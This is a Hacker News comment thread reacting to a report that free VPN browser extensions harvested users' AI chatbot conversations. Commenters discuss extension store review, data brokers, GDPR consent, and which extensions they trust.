jacquesm
1 day ago
[-]
And still, there is plenty of software that you can't run on anything but Windows. That's a major blocker at this point and projects like 'mono' and 'wine', while extremely impressive, are still not good enough to run that same software on Linux.
reply
varenc
1 day ago
[-]
What is the economic value of all these AI chat logs? I can see it useful for developing advertising profile. But I wonder if it's also just sold as training data for people try to build their own models?
reply
stevenjgarner
1 day ago
[-]
Pretty easy to match up those logs with browser fingerprinting to identify the actual user. Then you have "do you want to purchase what Mr. Foo Bar is prompting the LLM?"
reply
AznHisoka
1 day ago
[-]
Not just advertising but market research. Loads of people want to know exactly what type of questions ppl are asking these chat bots
reply
why-o-why
1 day ago
[-]
I'm glad the extension system isn't broken (e.g. extensions being hacked). This is just scammy extensions to begin with. I've been scared of extensions since they were first offered (I did like useing greasemonkey to customize everything back in the 2000's/2010's), but I can't resist privacy badger and Ublock Origin since they are open source (but even then it's still a risk).
reply
throw310822
1 day ago
[-]
[flagged]
reply
banku_brougham
1 day ago
[-]
I would figure state actors don’t need to go through the trouble of a browser extension. But, yeah.
reply
onion2k
1 day ago
[-]
I'm not a spy so I don't know, but surely in most scenarios it's a lot easier to just ask someone for some data than it is hack/steal it. 25 years of social media has shown that people really don't care about what they do with their data.
reply
Leptonmaniac
1 day ago
[-]
Wasn't there a comment on this phenomenon along the lines "we were so afraid of 1984 but what we really got was Brave New World"?
reply
omnicognate
1 day ago
[-]
The apathy of the oppressed is a core theme of 1984.
reply
XorNot
1 day ago
[-]
Not really? In 1984 you were made an active participant of the oppression. The thought police and 5 minutes hate all required your active, enthusiastic participation.

Brave New World was apathy: the system was comfortable, Soma was freely available and there was a whole system to give disruptive elements comfortable but non disruptive engagement.

The protagonist in Brave New World spends a lot of time resenting the system but really he just resents his deformity, wanted what it denied him in society, and had no real higher criticisms of it beyond what he felt he couldn't have.

reply
omnicognate
1 day ago
[-]
1984 has coercive elements lacking from Brave New World, but the lack of any political awareness or desire to change things among the proles was critical to the mechanisms of oppression. They were generally content with their lot, and some of the ways of ensuring that have parallels to Brave New World. Violence and hate were used more than sex and drugs but still very much as opiates of the masses: encourage and satisfy base urges to quell any desire to rebel. And sex was used to some extent: although sex was officially for procreation only, prostitution was quietly encouraged among the proles.

You might even imagine 1984's society evolving into Brave New World's as the mechanisms of oppression are gradually refined. Indeed, Aldous Huxley himself suggested as much in a letter to Orwell [1].

[1] https://gizmodo.com/read-aldous-huxleys-review-of-1984-he-se...

reply
Terr_
1 day ago
[-]
Huh? Of course they would: It's way less work than defeating TLS/SSL encryption or hacking into a bunch of different servers.

Bonus points if the government agency can leave most of the work to an ostensibly separate private company, while maintaining a "mutual understanding" of government favors for access.

reply
vasco
1 day ago
[-]
Why wouldn't they? It isn't that you need to, just that obviously you would. You engage with the extension owners by sending an email from a director of a data company instead of as a captain of some military operation. The hit rate is going to be much higher with one of the strategies.
reply
GaryBluto
1 day ago
[-]
Download Valley strikes again!
reply
yoan9224
1 day ago
[-]
This is exactly why we need more transparency in analytics tools. When building products that handle user data, the "free" model almost always means you're the product.

The scary part is these extensions had Google's "Featured" badge. Manual review clearly isn't enough when companies can update code post-approval. We need continuous monitoring, not just one-time vetting.

For anyone building privacy-focused tools: making your data collection transparent and your business model clear upfront is the only way to build trust. Users are getting savvier about this.

reply
chhxdjsj
1 day ago
[-]
How did I know this was an israeli company just by how unethical they are at scale?
reply
talhof8
1 day ago
[-]
Well, you’d be surprised to discover that Koi is also an Israeli company, and they were the ones who even discovered this

https://www.calcalistech.com/ctechnews/article/syoe1xjslx

reply
hnbad
1 day ago
[-]
It would have been no less suprising to me had it been a US company but it certainly fits the cultural stereotype of callousness that particular country has been openly displaying in recent years.
reply
chhxdjsj
1 day ago
[-]
And what are the odds that mossad are getting access to this data?
reply
kvam
1 day ago
[-]
Some people have mentioned that this is a U.S incorporated company (Delaware). Recommend reading Moneyland by Oliver Bullough if you want to know more about the U.S role as the new shell company haven.

The island states have been dethroned.

reply
free_bip
1 day ago
[-]
Is the use of WebAssembly going to make spotting these malicious extensions harder?
reply
pyrolistical
1 day ago
[-]
Probably not. All side effects need to go through the js side. So you can alway see where http calls are made
reply
x-complexity
1 day ago
[-]
> Probably not. All side effects need to go through the js side. So you can alway see where http calls are made

That can be circumnavigated by bundling the conversations into one POST to an API endpoint, along with a few hundred calls to several dummy endpoints to muddy the waters. Bonus points if you can make it look like an normal-passing update script.

It'll still show up in the end, but at this point your main goal is to delay the discovery as much as you can.

reply
g947o
1 day ago
[-]
As soon as you hijack the fetch function (which cannot be done with WebAssembly alone), it's going to look suspicious, and someone who looks at this carefully enough will flag it.
reply
mjmas
1 day ago
[-]
> This means a human at Google reviewed Urban VPN Proxy and concluded it met their standards.

Or that the review happened before the code harvested all the LLM conversations and never got reviewed after it was updated.

reply
growt
1 day ago
[-]
I think this is most likely what happened. The update/review process for extensions is broken. Apparently you can add any malicious functionality after you’re in and also keep any badges and recommendations.
reply
antipaul
1 day ago
[-]
I wouldn't be surprised if this was done by one of those AI companies themselves!

Remember FaceBook x Onavo?

"Facebook used a Virtual Private Network (VPN) application it acquired, called Onavo Protect, as a surveillance tool to monitor user activity on competing apps and websites"

reply
hexagonwin
1 day ago
[-]
lol, this Urban VPN addon was available for Firefox too but got removed at some point. https://old.reddit.com/r/firefox/comments/1jb4ura/what_happe...
reply
Agraillo
1 day ago
[-]
Thanks, the last fetched page on archive.org is from 2025-01-26 [1], removed after this date and before 2025-02-13. 155,477 users at the moment, 1 star reviews were mostly about not working. It's interesting that the developers didn't care to remove the button directing to the ff add-on page at least several months after the removal. Maybe was some kind of PR compromise, they probably thought that listing it with linking to a broken page was better than not listing at all.

A review page [2] mentions that this add-on is a peer-to-peer vpn, not having its own dedicated servers that already makes it suspicious.

[1] https://web.archive.org/web/20250126133131/https://addons.mo...

[2] https://www.vpnmentor.com/reviews/urban-vpn/

reply
smallerfish
1 day ago
[-]
Somewhat ironically, this article has significant amounts of AI writing in it. (I've done a lot of AI writing in my own sites, and have been learning how to smother "the voice". This article doesn't do a good job of smothering.)
reply
miladyincontrol
1 day ago
[-]
Oh, a free of cost vpn extension that requires access to all sites and data is somehow spyware, color me surprised.

With those extensions the user's data and internet are the product, most if not all are also selling residential IP access for scrapers, bots, etc.

Good thing Google is protecting users by taking down such harmful extensions as ublock origin instead.

reply
SoftTalker
1 day ago
[-]
ublock requires access to all sites and data. Maybe they are trustworthy but who really knows?
reply
fylo
1 day ago
[-]
Let's say we don't trust ublock. At the very least it is still blocking ad networks which do reduce internet performance and are vectors of exploitation, so it is still adding value whether you trust it or not.
reply
Retr0id
1 day ago
[-]
Under the hypothetical that we don't trust ublock, it would be foolish to grant it full access to all data on all websites. It would not be adding value.
reply
DrewADesign
1 day ago
[-]
Yeah — they’d be selling enhanced versions of that data to every site they blocked, and then some. I very much doubt they are.
reply
bandrami
1 day ago
[-]
I mean, I don't trust ublock, for what it's worth. I just disable javascript by default with has pretty much the same effect.
reply
jrochkind1
1 day ago
[-]
Is this criminally prosecutable?
reply
yalogin
1 day ago
[-]
Why would one expect privacy with a vpn? That too a free one? With the web all traffic is encrypted point to point, which means individual sites could compromise your privacy but there is no single funnel to lose all your data. VPN is exactly that! All data goes through a single funnel and they can target anything they want
reply
estimator7292
1 day ago
[-]
Because VPNs are exclusively and heavily marketed and sold as magical turnkey solutions to privacy, encryption, hair loss, and more!
reply
daniel_iversen
1 day ago
[-]
Would using native AI apps only prevent this? I think so right?
reply
nottorp
1 day ago
[-]
Which "AI" has a native app?

Or you mean the web sites packed with a copy of chromium?

reply
deepfriedbits
1 day ago
[-]
Correct. The article is about Chrome and MS Edge browser extensions.
reply
phkahler
1 day ago
[-]
Why is a security researcher using a Free VPN? The standard wisdom is "if its free, you're the product". So you're going to proxy all your sensitive traffic through a free thing? Its not great to trust paid services with your data, nevermind free stuff.

Sometimes knowing tech makes us think we're somehow better and can bypass high level wisdom.

reply
sothatsit
1 day ago
[-]
They are not. They found it by searching for extensions that had the capability to exfiltrate data.

> We asked Wings, our agentic-AI risk engine, to scan for browser extensions with the capability to read and exfiltrate conversations from AI chat platforms.

reply
Rakshath_1
1 day ago
[-]
This is a huge trust failure. A VPN or ad blocker quietly harvesting full AI conversations is the opposite of what users expect, and the fact that these extensions were featured makes it even worse. This really puts the effectiveness of browser extension reviews into question.
reply
raincole
1 day ago
[-]
Am I just paranoid or open router is the next bomb ticking to a privacy explosion? What is their business model anyway?
reply
metaphorproj
1 day ago
[-]
Note that in the profile of a model in Openrouter, under Data Policy, there is a statement as "Prompt Training". Some of model will clearly stated that prompt training is true, even for paid models.
reply
xeeeeeeeeeeenu
1 day ago
[-]
>What is their business model anyway?

They take a 5.5% fee whenever you buy credits. There's also a discount for opting-in to share your prompts for training.

reply
nwellinghoff
1 day ago
[-]
Nice write up. It would be great if the authors could follow up with a detailed technical walk through of how to use the various tooling to figure out what an extension is really doing.

Could one just feed the extension and a good prompt to claude to do this? Seems like automation CAN sniff this kind of stuff out pretty easily.

reply
dgellow
1 day ago
[-]
Do we know for how much that type of content sells? Not that I'm interested in entering the market, but the economics of that kind of thing are always fascinating. How much are buyers willing to pay for AI conversations? I would expect the value to be pretty low
reply
AznHisoka
1 day ago
[-]
I doubt its the actual conversations but the aggregated insights that are valuable.

Think: is my brand getting mentioned more in AI chats? Are people associating positive or negative feelings towards it? Are more people asking about this topic lately?

reply
dgellow
1 hour ago
[-]
Sure, but are they willing to pay and if yes how much. There is a meaningful difference between « could be useful » and « valuable enough that we want to buy »
reply
pxtail
1 day ago
[-]
Let's assume that people are discussing medical conditions in these conversations - I think that insurance companies would be pretty interested to get this kind of data in their hands.
reply
dgellow
1 hour ago
[-]
The question isn’t if there is some interesting info in that data but if there are some actual buyers. Lots of interesting data exist, so what’s the value of AI chats?
reply
matt3210
1 day ago
[-]
What would the fallout look like if too many people start to have horror stories about how much their life is destroyed by incriminating or down right nasty or wrong ai chat history. It'll suddenly become a tool where you can't be honest. If it's not already.
reply
AznHisoka
1 day ago
[-]
I wish Congress spent as much time fighting about issues like this vs trying to break up Google. This is far more impact.

Articles like this do a decent job of bringing awareness, but we all know Google will do absolutely nothing

reply
ericand
1 day ago
[-]
Can someone just AI all the privacy policies please and tell us who else is pranking?
reply
drnick1
1 day ago
[-]
> A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."

Trusting Google with your privacy is like putting the fox in charge of the henhouse.

reply
tasuki
1 day ago
[-]
> And then an uncomfortable thought: what if someone was reading all of this?

> The thought didn't let go. As a security researcher, I have the tools to answer that question.

What huh, no you don't! As a security researcher you should know better!

reply
tasuki
1 day ago
[-]
> Exactly the kind of tool someone installs when they want to protect themselves online.

No. When you want to increase your security, you install fewer tools.

Each tool increases your exposure. Why is the security industry full of people who don't get this?

reply
ttldlinhtm
21 hours ago
[-]
I think using AI is very helpful today but if the data is selt for HR it's very bad
reply
dguido
1 day ago
[-]
If you want a VPN you can trust, deploy your own with AlgoVPN: https://github.com/trailofbits/algo
reply
bluepuma77
1 day ago
[-]
I prefer WG-Easy (https://github.com/wg-easy/wg-easy), which uses a Docker container, not ansible.
reply
netbioserror
1 day ago
[-]
I treat extensions like they're all capable of privileged local code execution. My selection is very vetted and very small.
reply
andersa
1 day ago
[-]
The only extensions I have installed are dark reader and ublock origin. Would be nice if I could disable auto updating for them somehow and run local pinned versions...
reply
cluckindan
1 day ago
[-]
Get the source code and manually pack your own unsigned web-ext’s.
reply
temp0826
1 day ago
[-]
Add-ons Manager -> (click the add-on in question) -> change "Allow automatic updates" to "Off"

(for firefox/derivatives anyways...)

reply
matheusmoreira
1 day ago
[-]
Same here, uBlock Origin and EFF's Privacy Badger are the only extensions I trust enough to install.
reply
eszed
1 day ago
[-]
Ditto, plus 1pass / BitWarden.
reply
4ndrewl
1 day ago
[-]
"And then an uncomfortable thought: what if someone was reading all of this?"

If you really are a security researcher then that's not true. You already know all this.

reply
torginus
1 day ago
[-]
Wasn't the whole coercion Google did around Manifest V3 in the name of security?

How is it possible to have extensions this egregiously malicious in the new system?

reply
notjonheyman
1 day ago
[-]
From my experience, Google does not do a thorough app review. Reviewers get maybe a few minutes to review and move on due to the volume of apps awaiting review.
reply
Oarch
1 day ago
[-]
I imagine this would be a great use case for AI helping out?
reply
lodovic
1 day ago
[-]
I'm thinking of installing the extension in a sandbox and then use a local agent to have endless fake conversations with it
reply
automatedideas
1 day ago
[-]
“There’s too much human harmful code to review and too few human reviewers.”

“I know, let’s have an AI do all the work for us instead. Let’s take a coffee break.”

reply
free_bip
1 day ago
[-]
No way that could backfire... Prompt injection is a solved problem right?
reply
Dylan16807
1 day ago
[-]
8 million users on sketchy VPN extensions.

70 thousand users on what I would actually call "privacy" extensions.

Bit of a misleading title then.

reply
saretup
1 day ago
[-]
With hardcoded flags like “sendClaudeMessages” and “sendChatgptMessages”, they weren’t even trying to hide it.
reply
ArtRichards
1 day ago
[-]
Is this the same Google that is preventing us from installing unapproved software on our phones?
reply
meindnoch
1 day ago
[-]
Only those users that were stupid enough to "converse" with their chatbot.
reply
jmward01
1 day ago
[-]
This is digital assault of 8m people and should be treated that way.
reply
jukkat
1 day ago
[-]
Why these browser extensions cannot live in a guarded sandbox? Extensions are given full access to whatever is available on any page. I had legacy React developer tools and Redux DevTools installed for years. What a great attack vector.
reply
andsoitis
1 day ago
[-]
> A free VPN promising privacy and security.

If you are not paying for the product, you are the product.

reply
frm88
1 day ago
[-]
Can we please, please stop using this absolutely deprecated proverb? As shown in YouTube lite, Samsung fridges with ads, cars with telemetry etc. etc. even if you paid, you are still subject to manipulation, spyware, ads and telemetry. It has absolutely nothing to do with payment.
reply
andsoitis
1 day ago
[-]
While that’s not untrue, I think one ought to be extra suspicious if you get something of value (eg VPN software that guarantees privacy and security, in this particular case), that cost the operator money but you get it for free.

Perhaps a better proverb would be: there ain’t no free lunch.

reply
RataNova
1 day ago
[-]
If the business model isn't obvious, you are the product
reply
cmiles8
1 day ago
[-]
If the product is free, you are the product.
reply
danielfalbo
1 day ago
[-]
The footer animation of koi.ai is so cool.
reply
cryptoegorophy
1 day ago
[-]
Pro tip - never install any browser extensions. Avoid like a plague. I had a couple installed that were “legitimate” and I have direct evidence of them leaking/selling my browsing data. Just avoid.
reply
lionkor
1 day ago
[-]
> We asked Wings, our agentic-AI risk engine

I hate to be that guy, but I am having a difficult time verifying any of this. How likely is it that this is entirely hallucinated? Can anyone independently verify this?

reply
2OEH8eoCRo0
1 day ago
[-]
These converstions can be used to train a competing AI
reply
msdgfkjsfg
1 day ago
[-]
b xncbb vnxv
reply
msdgfkjsfg
1 day ago
[-]
fasdfas
reply
awaymazdacx5
1 day ago
[-]
There were these two people.

And um, a boy and a girl.

...

Anyway, the thing was that one day they started acting kinda funny. Kinda, weird.

They started being seen exchanging tokens of affection.

And it was rumoured they were engaging in...

reply
hnbad
1 day ago
[-]
Note that this is a pretty blatant GDPR violation and you should report this to the local data protection agency if you are a EU resident and care about this (especially if you've used this extension). Their privacy policy claims the data collection is consent-based and that the app settings also let you revoke this consent. According to the article, the latter isn't the case and the user is never informed of the extent of the collection and the risk of sensitive or specially protected personal information (e.g. sexual orientation) being part of the data they're collecting. Their privacy policy states the collected data is filtered to remove this kind of information but that's irrelevant because processing necessarily happens after collection and the GDPR already applies at the start of that pipeline.

If Urban VPN is indeed closely affiliated with the data broker, a GDPR fine might also affect that company too given how these fines work. There is a high bar for the kind of misconduct that would result in a fine but it seems plausible that they're being knowingly and deliberately deceptive and engaging in widespread data collection that is intentionally invasive and covert. That would be a textbook example for the kind of behavior the GDPR is meant to target with fines.

The same likely applies to the other extensions mentioned in the article. Yes, "if the product is free, you are the product" but that is exactly why the GDPR exists. The problem isn't that they're harvesting user data but that they're being intentionally deceptive and misleading in their statements about this, claim they are using consent as the legal basis without having obtained it[0], and they're explicitly contradicting themselves in their claims ("we're not collecting sensitive information that would need special consideration but if we do we make sure to find it and remove it before sharing your information but don't worry because it's mostly used in aggregate except when it isn't"). Just because you except some bruising when picking up martial arts as a hobby doesn't mean your sparring partner gets to pummel your face in when you're already knocked out.

[0]: Because "consent" seems to be a hard concept for some people to grasp: it's literally analogous to what you'd want to establish before having sex with someone (though to be fair: the laws are much more lenient about unclear consent for sex because it's less reasonable to expect it to be documented with a paper trail like you can easily do for software). I'll try to keep it SFW but my place of work is not your place of work so think carefully if you want to copy this into your next Powerpoint presentation.

Does your prospective sexual partner have any reason to strongly believe that they can't refuse your advances because doing so would limit their access to something else (e.g. you took them on a date in your car and they can't afford a taxi/uber and public transport isn't available so they rely on you to get back home, aka "the implication")? Then they can't give you voluntary consent because you're (intentionally or not) pressuring them into it. The same goes if you make it much harder for them to refuse than to agree (I can't think of a sex analogy for this because this seems obvious in direct human interactions but somehow some people still think hiding "reject all non-essential" is an option you are allowed to hide between two more steps when the "accept all" button is right there even if the law explicitly prohibits these shenanigans).

Is your prospective sexual partner underage or do they appear extremely naive (e.g. you suspect they've never had any sex ed and don't know what having sex might entail or the risks involved like pregnancy, STIs or, depending on the acts, potential injuries)? Then they probably can't give you informed consent because they don't fully understand what they're consenting to. For data processing this would be failure to disclose the nature of the collection/processing/storage that's about to happen. And no, throwing the entire 100 page privacy policy at them with a consent dialog at the start hardly counts the same way throwing a biology textbook at a minor doesn't make them able to consent.

Is your prospective sexual partner giving you mixed signals but seems to be generally okay with the idea of "taking things further"? Then you're still missing specific consent and better take things one step at a time checking in on them if they're still comfortable with the direction you're taking things before you decide to raw dog their butt (even if they might turn out to be into that). Or in software terms, it's probably better to limit the things you seek consent for to what's currently happening for the user (e.g. a checkbox on a contact form that informs them what you actually intend to do with that data specifically) rather than try to get it all in one big consent modal at the start - this also comes with the advantage that you can directly demonstrate when and how the specific consent relevant to that data was obtained when later having to justify how that data was used in case something goes wrong.

Is your now-active sexual partner in a position where they can no longer tell you to stop (e.g. because they're tied up and ball-gagged)? Then the consent you did obtain isn't revokable (and thus again invalid) because they need to be able to opt out (this is what "safe words" are for and why your dentist tells you to raise your hand where they can see it if you need them to stop during a procedure - given that it's hard to talk with someone's hands in your mouth). In software this means withdrawing consent (or "opting out") should be as easy as it was to give it in the first place - an easy solution is having a "privacy settings" screen easily accessible in the same place as the privacy policy and other mandatory information that at the very least covers everything you stuffed in that consent dialog I told you not to use, as well as anything you tucked away in other forms downstream. This also gives you a nice place to link to at every opportunity to keep your user at ease and relaxed to make the journey more enjoyable for both of you.

reply
deaux
1 day ago
[-]
They're probably only incorporated in the US, so it's meaningless. If they plan to establish a corp in the EU they'll just put it in Ireland and bribe Ireland like all of US big tech does. This is a solved thing.
reply
jsrozner
1 day ago
[-]
TLDR: AI company uses AI to write blog post about abusive AI chrome extension

(Yes it really is AI-written / AI-assisted. If your AI detectors don’t go off when you read it you need to be retrained.)

reply
hathym
1 day ago
[-]
ctrl-f israel: 1 result found
reply
hathym
1 day ago
[-]
4*
reply
brsc2909
1 day ago
[-]
2*
reply
tlogan
1 day ago
[-]
Deleted.
reply
cycomanic
1 day ago
[-]
What sort of argument is that? Just because I need to eat (also let's be real the developers/owners behind this app are not struggling to get food on the table), does excuse me doing unethical/illegal things (and this behaviour is almost certainly illegal in the EU at least).
reply
atmosx
1 day ago
[-]
There is a “contradictions” section that clearly explains why this is a scam of the highest order.

There are honest ways to make a living. In this case honest is “being transparent” about the way data is handled instead of using newspeak.

reply
jrochkind1
1 day ago
[-]
The guy that holds up people for money in the alley is a human too, people forget, and needs to pay for food and a place to live. Of course they do too.
reply
brikym
1 day ago
[-]
It's ridiculous how many comments are being removed.
reply